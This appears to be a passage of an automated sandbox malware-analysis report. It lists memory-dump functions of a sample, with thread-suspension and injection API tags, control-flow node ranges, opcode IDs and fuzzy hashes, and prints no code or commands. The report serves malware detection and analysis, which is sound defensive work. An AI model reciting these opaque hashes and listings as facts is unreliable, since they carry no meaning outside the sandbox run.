                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bacab22ba18179e82cc02dd0155d560639faf2bdda2424ab19931a588d100aff
                                                    • Instruction ID: 1d750482be43d77ddaaf02144b8b08e609e33f284f1fc234bb386e4d57492e34
                                                    • Opcode Fuzzy Hash: bacab22ba18179e82cc02dd0155d560639faf2bdda2424ab19931a588d100aff
                                                    • Instruction Fuzzy Hash: 14F2737094891C8FDF99EF18C894FA9B7B1FB69305F1441A9D00EE76A1DA31AE81CF40
                                                    Function 00007FFAAC730040 Relevance: 1.7, APIs: 1, Instructions: 167threadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 223 7ffaac730040-7ffaac730079 224 7ffaac73007c-7ffaac730152 ResumeThread 223->224 225 7ffaac73007b 223->225 229 7ffaac73015a-7ffaac7301a4 224->229 230 7ffaac730154 224->230 225->224 230->229
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1470954848.00007FFAAC720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC720000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaac720000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID: ResumeThread
                                                    • String ID:
                                                    • API String ID: 947044025-0
                                                    • Opcode ID: 83ef0875b247adf487aa4e0e64a0e4b42480c5417c3f65e694e653abe0c66609
                                                    • Instruction ID: 949861b35f7fa433b92e544d3d81e3c7cca969f7744bdf2e233fbea6e49ca484
                                                    • Opcode Fuzzy Hash: 83ef0875b247adf487aa4e0e64a0e4b42480c5417c3f65e694e653abe0c66609
                                                    • Instruction Fuzzy Hash: E6517C7090C78C8FDB55DBA8C855AE9BFF0EF56310F0441AFD049EB292DA349846CB41
                                                    Function 00007FFAAC72E84D Relevance: 1.6, APIs: 1, Instructions: 143threadinjectionCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 233 7ffaac72e84d-7ffaac72e859 234 7ffaac72e85b-7ffaac72e863 233->234 235 7ffaac72e864-7ffaac72e932 SuspendThread 233->235 234->235 239 7ffaac72e93a-7ffaac72e984 235->239 240 7ffaac72e934 235->240 240->239
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1470954848.00007FFAAC720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC720000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaac720000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID: SuspendThread
                                                    • String ID:
                                                    • API String ID: 3178671153-0
                                                    • Opcode ID: 47544abff329be722cc5522dee3aa6faa4e3eec90fd8aea96389bd6523eac647
                                                    • Instruction ID: d91eef6a84737378109f7932d6677afa735fcab276b7ee25e89e9e3bd4b3ffac
                                                    • Opcode Fuzzy Hash: 47544abff329be722cc5522dee3aa6faa4e3eec90fd8aea96389bd6523eac647
                                                    • Instruction Fuzzy Hash: 41416C70D0864C8FDB58DFA8D885BEDBBF0FB5A311F10416AD04DE7252DA70A845CB41
                                                    Function 00007FFAAC731E35 Relevance: 1.6, APIs: 1, Instructions: 137COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 243 7ffaac731e35-7ffaac731f13 GetFileAttributesW 247 7ffaac731f1b-7ffaac731f59 243->247 248 7ffaac731f15 243->248 248->247
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1470954848.00007FFAAC720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC720000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaac720000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID: AttributesFile
                                                    • String ID:
                                                    • API String ID: 3188754299-0
                                                    • Opcode ID: f23febe497c4e78502bfd11374cd58f4d349156fbc0722f2d3daac5568380b05
                                                    • Instruction ID: cfae0ecddde7d1209680294ec6c9878f8b6982e0acad7ac1a24d2967d4524a1a
                                                    • Opcode Fuzzy Hash: f23febe497c4e78502bfd11374cd58f4d349156fbc0722f2d3daac5568380b05
                                                    • Instruction Fuzzy Hash: 69411A70D0864C8FDB98DF98D885BEDBBF0FB5A310F10416AD00DE7252DA719845CB41
                                                    Function 00007FFAAC5BF9C0 Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1468281331.00007FFAAC5B5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B5000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaac5b5000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: )L_H
                                                    • API String ID: 0-3235562293
                                                    • Opcode ID: e950a5640e6739aec45dee6c7c608bc80cb6c69ed551f811226269e70dcde23d
                                                    • Instruction ID: 7cc3b53e344c930e2a6660b46e24ba24b70782b03b5c0ed969ad4bf11af248d9
                                                    • Opcode Fuzzy Hash: e950a5640e6739aec45dee6c7c608bc80cb6c69ed551f811226269e70dcde23d
                                                    • Instruction Fuzzy Hash: C0C10D74A4891D8FDB98EF68C895BA9B7B2FF58300F5085A9D00DE3256DF34A985CF40
                                                    Function 00007FFAACCD16D8 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 299 7ffaaccd16d8-7ffaaccd16f0 301 7ffaaccd16f8-7ffaaccd1723 299->301 305 7ffaaccd174c-7ffaaccd1752 301->305 306 7ffaaccd1759-7ffaaccd175f 305->306 307 7ffaaccd1725-7ffaaccd173e 306->307 308 7ffaaccd1761-7ffaaccd1766 306->308 309 7ffaaccd1744-7ffaaccd1749 307->309 310 7ffaaccd1835-7ffaaccd1845 307->310 311 7ffaaccd1653-7ffaaccd1698 308->311 312 7ffaaccd176c-7ffaaccd17a1 308->312 309->305 318 7ffaaccd1847 310->318 319 7ffaaccd1848-7ffaaccd1896 310->319 311->306 316 7ffaaccd169e-7ffaaccd16a4 311->316 320 7ffaaccd16a6 316->320 321 7ffaaccd1655-7ffaaccd182d 316->321 318->319 324 7ffaaccd16cf-7ffaaccd16d6 320->324 321->310 324->299 327 7ffaaccd16a8-7ffaaccd16c1 324->327 327->310 328 7ffaaccd16c7-7ffaaccd16cc 327->328 328->324
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1477945256.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaaccd0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID: 0-3916222277
                                                    • Opcode ID: 1cf7f17d546f2e930a8da48eea6e36b9d327ee00945c77c57550afeebf4d2ada
                                                    • Instruction ID: 62553a121c41cf725e4d8b121a720bc695fc11831f4cd19a9a24793726916080
                                                    • Opcode Fuzzy Hash: 1cf7f17d546f2e930a8da48eea6e36b9d327ee00945c77c57550afeebf4d2ada
                                                    • Instruction Fuzzy Hash: 5D513A71D0964ACFEB49DF98C4516FDBBB1EF49310F1481BED00EA7692CA34A945CB81
                                                    Function 00007FFAAC7301A9 Relevance: 1.4, APIs: 1, Instructions: 145COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 331 7ffaac7301a9-7ffaac7301b5 332 7ffaac7301c0-7ffaac730292 CloseHandle 331->332 333 7ffaac7301b7-7ffaac7301bf 331->333 337 7ffaac73029a-7ffaac7302ee 332->337 338 7ffaac730294 332->338 333->332 338->337
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1470954848.00007FFAAC720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC720000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaac720000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    • Opcode ID: 5502a7a6d70d4e2cb6c0fbe04b7b6d95d53a789615febd5ac7f937b85c5e7971
                                                    • Instruction ID: 630303e248f0a5231435cc5416b28dff3b48c8f927915f8e1d863617f0977c11
                                                    • Opcode Fuzzy Hash: 5502a7a6d70d4e2cb6c0fbe04b7b6d95d53a789615febd5ac7f937b85c5e7971
                                                    • Instruction Fuzzy Hash: 81416C70D0864C8FDB59DFA8C889BECBBF0FB56310F1041AED049E7292DA34A845CB41
                                                    Function 00007FFAAC58AF17 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 341 7ffaac58af17-7ffaac58af18 342 7ffaac58af1a-7ffaac58af36 341->342 343 7ffaac58aebb-7ffaac58aec3 341->343 344 7ffaac58aece-7ffaac58aed8 343->344
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1468281331.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaac580000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 7
                                                    • API String ID: 0-1790921346
                                                    • Opcode ID: 8a3367da4d5d824fa49d43bec1c3c8fd06095ee251e3d2d6b6fcbc9afe8ec201
                                                    • Instruction ID: c6a3a96c278a65ca7f915fa447fff2f6acf7eb48afac1832a6efe10993f7df06
                                                    • Opcode Fuzzy Hash: 8a3367da4d5d824fa49d43bec1c3c8fd06095ee251e3d2d6b6fcbc9afe8ec201
                                                    • Instruction Fuzzy Hash: BBE01C60A4911B8AFB309B18C854BBA77A5AF45700F1082F5D00DAA686CF749A8A9BC0
                                                    Function 00007FFAACCDC61C Relevance: 1.2, Instructions: 1243COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 346 7ffaaccdc61c-7ffaaccdc620 347 7ffaaccdc626-7ffaaccdc6f5 346->347 348 7ffaaccdc6f8-7ffaaccdc7cf 346->348 347->348 359 7ffaaccdc838-7ffaaccdc86a call 7ffaaccdd6cd 348->359 360 7ffaaccdc7d1-7ffaaccdc7d6 348->360 369 7ffaaccdc86b-7ffaaccdc8ad 359->369 360->359 361 7ffaaccdc7d8-7ffaaccdc831 360->361 361->359 374 7ffaaccdc8ae 369->374 374->369 375 7ffaaccdc8b0-7ffaaccdc92c 374->375 375->374 380 7ffaaccdc92e-7ffaaccdc956 375->380 382 7ffaaccdd4f6-7ffaaccdd514 call 7ffaaccdd748 call 7ffaaccdd798 380->382 383 7ffaaccdc95c-7ffaaccdc9e6 380->383 390 7ffaaccdcd03-7ffaaccdcd79 383->390 391 7ffaaccdc9ec-7ffaaccdca62 383->391 399 7ffaaccdcdb3-7ffaaccdce6a 390->399 400 7ffaaccdcd7b-7ffaaccdcdae 390->400 401 7ffaaccdca64-7ffaaccdca97 391->401 402 7ffaaccdca9c-7ffaaccdcb53 391->402 408 7ffaaccdce70-7ffaaccdcef7 399->408 400->408 407 7ffaaccdcb59-7ffaaccdcbe0 401->407 402->407 421 7ffaaccdcbe2-7ffaaccdcc15 407->421 422 7ffaaccdcc1a-7ffaaccdcce4 407->422 419 7ffaaccdcef9-7ffaaccdcf2c 408->419 420 7ffaaccdcf31-7ffaaccdcfe8 408->420 429 7ffaaccdcfee-7ffaaccdd075 419->429 420->429 427 7ffaaccdccf2-7ffaaccdccf8 421->427 440 7ffaaccdcceb-7ffaaccdccec 422->440 427->390 438 7ffaaccdd077-7ffaaccdd0aa 429->438 439 7ffaaccdd0af-7ffaaccdd166 429->439 443 7ffaaccdd16c-7ffaaccdd1f3 438->443 439->443 440->427 449 7ffaaccdd1f5-7ffaaccdd228 443->449 450 7ffaaccdd22d-7ffaaccdd2e4 443->450 453 7ffaaccdd2ea-7ffaaccdd371 449->453 450->453 459 7ffaaccdd373-7ffaaccdd3a6 453->459 460 7ffaaccdd3ab-7ffaaccdd4df 453->460 463 7ffaaccdd4e5-7ffaaccdd4eb 459->463 460->463 463->382
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1477945256.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaaccd0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e654acb3eac3b9ffe97d76fd9ae84d95315aa719cacc7ddf6a3467f5c8322cfe
                                                    • Instruction ID: a00d23302d6fbed20928f166155b00c968be67f698457c6a51462975b7441dad
                                                    • Opcode Fuzzy Hash: e654acb3eac3b9ffe97d76fd9ae84d95315aa719cacc7ddf6a3467f5c8322cfe
                                                    • Instruction Fuzzy Hash: BEB23270A5492C8FDF99EF18C894FA9B7B1FB69305F1041D9910EE76A1DA31AE81CF40
                                                    Function 00007FFAACCDEF65 Relevance: .7, Instructions: 660COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1477945256.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaaccd0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5953c2337757b891998b080920106c54e2621d4acb231bd9f0f13de5367efeb5
                                                    • Instruction ID: f563007273bb235a17a6712a2d3988855c0e177e7740781840acadb56cde346f
                                                    • Opcode Fuzzy Hash: 5953c2337757b891998b080920106c54e2621d4acb231bd9f0f13de5367efeb5
                                                    • Instruction Fuzzy Hash: 54427A7094891D8FDF99EF18C898BA9B7B1FB69301F1041EAD00EE76A1DA319D85CF41
                                                    Function 00007FFAACCDE060 Relevance: .5, Instructions: 527COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1477945256.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaaccd0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4609a6c949620fa7dfc5a58514dfdb68a2cf3c30ce9677887d1738b4f4cdad1a
                                                    • Instruction ID: 94fbad41ad6ec1a455ce99801cd368f95bc5c8a1de039c43cddd44d0aa5c0313
                                                    • Opcode Fuzzy Hash: 4609a6c949620fa7dfc5a58514dfdb68a2cf3c30ce9677887d1738b4f4cdad1a
                                                    • Instruction Fuzzy Hash: 91222374A4492D8FDF99EF18C898FA9B7B1FB69301F5041D9900EE7661DA31AE81CF40
                                                    Function 00007FFAACCDF027 Relevance: .5, Instructions: 486COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1477945256.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaaccd0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 386d8b1107e723eba68a726b2cdce6f7dd1971574749f051ce978004f54190d0
                                                    • Instruction ID: 68cf068818db323cd25dc153bc11234bf71e0080febe3853c16f26a8cb6cf0a3
                                                    • Opcode Fuzzy Hash: 386d8b1107e723eba68a726b2cdce6f7dd1971574749f051ce978004f54190d0
                                                    • Instruction Fuzzy Hash: 96029C7091891D8FDF95EF18C898BA9B7B1FB69301F1041EAD00EE76A1DA31AD85CF41
                                                    Function 00007FFAACCDA9E6 Relevance: .5, Instructions: 479COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1477945256.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaaccd0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 91232fbc3173d915e3c2743e7d4c14d55fa1a6af196a63e8dd90d1f54df1934f
                                                    • Instruction ID: c835d87d96060bbe73e6713e97b426cb09363d44a7f5f9e62cf269cb16ed2ae5
                                                    • Opcode Fuzzy Hash: 91232fbc3173d915e3c2743e7d4c14d55fa1a6af196a63e8dd90d1f54df1934f
                                                    • Instruction Fuzzy Hash: 13F17C70909A8D8FEBB9EF28C855BE937E0FB59311F00812AD84ED7691DF749584CB81
                                                    Function 00007FFAACCD2991 Relevance: .4, Instructions: 409COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1477945256.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaaccd0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 61818dc37e84159e8d3cd7385745259282c525c30d05805370ef21b6e7da9044
                                                    • Instruction ID: 0e1937be117cfcb446ecc087069de0a70d1b1d18f3dda79a5d2a599c780940bf
                                                    • Opcode Fuzzy Hash: 61818dc37e84159e8d3cd7385745259282c525c30d05805370ef21b6e7da9044
                                                    • Instruction Fuzzy Hash: 0DD1D33090EB468FE3AA9F28D49167577E1FF46300B1485BEC48FC3592EA29FC598781
                                                    Function 00007FFAACCD196F Relevance: .3, Instructions: 334COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1477945256.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaaccd0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 30c16b1c610315de89dc8bf66af751a86682be02f315e6097e9e8a5a4f932ebf
                                                    • Instruction ID: 6656fa53b7aa829756adb30edba0c3d69cba9478b58455cedaa65e4344fe3694
                                                    • Opcode Fuzzy Hash: 30c16b1c610315de89dc8bf66af751a86682be02f315e6097e9e8a5a4f932ebf
                                                    • Instruction Fuzzy Hash: 99C19070919646CFEB0ACF14D0D06B577A1FF86320B5485BED84F8B68ADB38E495CB84
                                                    Function 00007FFAACCDE730 Relevance: .3, Instructions: 333COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1477945256.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaaccd0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 65709910cda64d39816b601b4d984700e2f1ac65a526076a423804cbbfbf8a44
                                                    • Instruction ID: b6dbb3b5ee0b3eba338c38ae2a5ffda5a51e29e3a5b5946b0ab0d4fce6301ce9
                                                    • Opcode Fuzzy Hash: 65709910cda64d39816b601b4d984700e2f1ac65a526076a423804cbbfbf8a44
                                                    • Instruction Fuzzy Hash: 2CD1857494891D8FDFA9EF18C894BA9B7B5FB68701F1041DAD00EE7261CA31AE85CF40
                                                    Function 00007FFAACCD1202 Relevance: .3, Instructions: 326COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1477945256.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaaccd0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 348452a88facd8b210341373a0dfd75f185b51d42ed1939180bd24327ee48c0c
                                                    • Instruction ID: 494553cd3c24c01638fb1cf4015196498babe3fb8fc1aec9f0932ad503566258
                                                    • Opcode Fuzzy Hash: 348452a88facd8b210341373a0dfd75f185b51d42ed1939180bd24327ee48c0c
                                                    • Instruction Fuzzy Hash: 94B1CF30A1DA469FE74ADF28C0917A5B7A1FF4A310F54817AD44EC7E86DB28F86587C0
                                                    Function 00007FFAACCE1B79 Relevance: .3, Instructions: 310COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1477945256.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaaccd0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 184298ae9e3a0f71d10902c118830a4d79cdc1529a61f9a2ddc983c894b8a273
                                                    • Instruction ID: 72887f881426198d957906ae8ea74cd53d33d7e598ab9812f748334b792c709c
                                                    • Opcode Fuzzy Hash: 184298ae9e3a0f71d10902c118830a4d79cdc1529a61f9a2ddc983c894b8a273
                                                    • Instruction Fuzzy Hash: C0911631A09E498FFF99EF58C4556B87BE1EF6A341B0441BAD00ED7292DE24EC5687C0
                                                    Function 00007FFAACCE0F48 Relevance: .3, Instructions: 277COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1477945256.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaaccd0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3d7821f514073a838f0469460a3643da7c699b4a29bfbda0164d2758c1de9368
                                                    • Instruction ID: 9b0a06d8be91725bee0f3d2b74ac1174bb2e1d105c5b4e75e1348628a5b258c1
                                                    • Opcode Fuzzy Hash: 3d7821f514073a838f0469460a3643da7c699b4a29bfbda0164d2758c1de9368
                                                    • Instruction Fuzzy Hash: 4371C37171DA0A8FEB58EB18D441AB5B3E1FF66310714827AD04EC3A96EE25FC4687C4
                                                    Function 00007FFAACCD6321 Relevance: .3, Instructions: 269COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1477945256.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaaccd0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9f1ab88802481b514b074492d1946e60115efacb5e01477b6c9aa110fb2d848e
                                                    • Instruction ID: b5972b2215986f5eee632445f260a18e96077adcd456bf93768dd547258ce305
                                                    • Opcode Fuzzy Hash: 9f1ab88802481b514b074492d1946e60115efacb5e01477b6c9aa110fb2d848e
                                                    • Instruction Fuzzy Hash: E6911774908A1D8FDF98DF58C845BE9BBB1FB69310F1082AAD00DE3255DB74A985CF81
                                                    Function 00007FFAACCD0746 Relevance: .3, Instructions: 259COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1477945256.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaaccd0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4aac851acf7ff1b0c2c05c5f2a40904dc1f9d5f2cf590320856538341f144e9c
                                                    • Instruction ID: 12e68a72334b47ccd15808a0b75775ece87f9e3ca4e44fb1d35802c65cfaa913
                                                    • Opcode Fuzzy Hash: 4aac851acf7ff1b0c2c05c5f2a40904dc1f9d5f2cf590320856538341f144e9c
                                                    • Instruction Fuzzy Hash: C581133191EA429BF72A5F2C98552B9B7E0EF46310B15853FD48EC3182DE28F45A87C1
                                                    Function 00007FFAACCE1F89 Relevance: .2, Instructions: 218COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1477945256.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaaccd0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f81ae37dcc5741255a5fbdef33132e4e2e353f4305a868cd359ba1a5035b0fcd
                                                    • Instruction ID: 0e83fb524502579e3a5d92e188c08dc72ed91042cda17c15791dcee7aad24387
                                                    • Opcode Fuzzy Hash: f81ae37dcc5741255a5fbdef33132e4e2e353f4305a868cd359ba1a5035b0fcd
                                                    • Instruction Fuzzy Hash: 28519171A1DA068FEB69AB18C441A75B3E1FF6A3107148279D44EC7A96DE34FC4687C0
                                                    Function 00007FFAACCE19B8 Relevance: .2, Instructions: 211COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1477945256.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaaccd0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 72042a84d39796d3d43ef32aa91f9410dc47b9a2ff73566565cc1f6baf531e01
                                                    • Instruction ID: 7621f59abdb05d846dac0be7403f6ba70a6f772262be7991e1ae15af1fcd77ab
                                                    • Opcode Fuzzy Hash: 72042a84d39796d3d43ef32aa91f9410dc47b9a2ff73566565cc1f6baf531e01
                                                    • Instruction Fuzzy Hash: 5E514962A1DF8A4FE799AB2C84152767BD1EF9735170481BED04EC3293CE18EC5A83C0
                                                    Function 00007FFAAC5808E8 Relevance: .2, Instructions: 208COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1468281331.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaac580000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b2ac88a44d18feb09ba82b723e4539781468f8c058dd1652ecadf967e01adfbc
                                                    • Instruction ID: ddbd9b1b1a7b9c4390c6c5751c26992aae25b5157a0988e93ad5ab0b9301c017
                                                    • Opcode Fuzzy Hash: b2ac88a44d18feb09ba82b723e4539781468f8c058dd1652ecadf967e01adfbc
                                                    • Instruction Fuzzy Hash: BF712971A0861A9FDB44EF68D494EED7BE0EF59324F0545B6E04DDB262DA34E880CB80
                                                    Function 00007FFAACCDC3C2 Relevance: .2, Instructions: 199COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1477945256.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaaccd0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b26a6647b8ac46365cd9c09f90ebb2ee469845688fcdd8fa482d6d276a5f0af9
                                                    • Instruction ID: b352cfe79d3e0ae563b150c397ffc740f42c85336315ca68da462edc6b8e9b19
                                                    • Opcode Fuzzy Hash: b26a6647b8ac46365cd9c09f90ebb2ee469845688fcdd8fa482d6d276a5f0af9
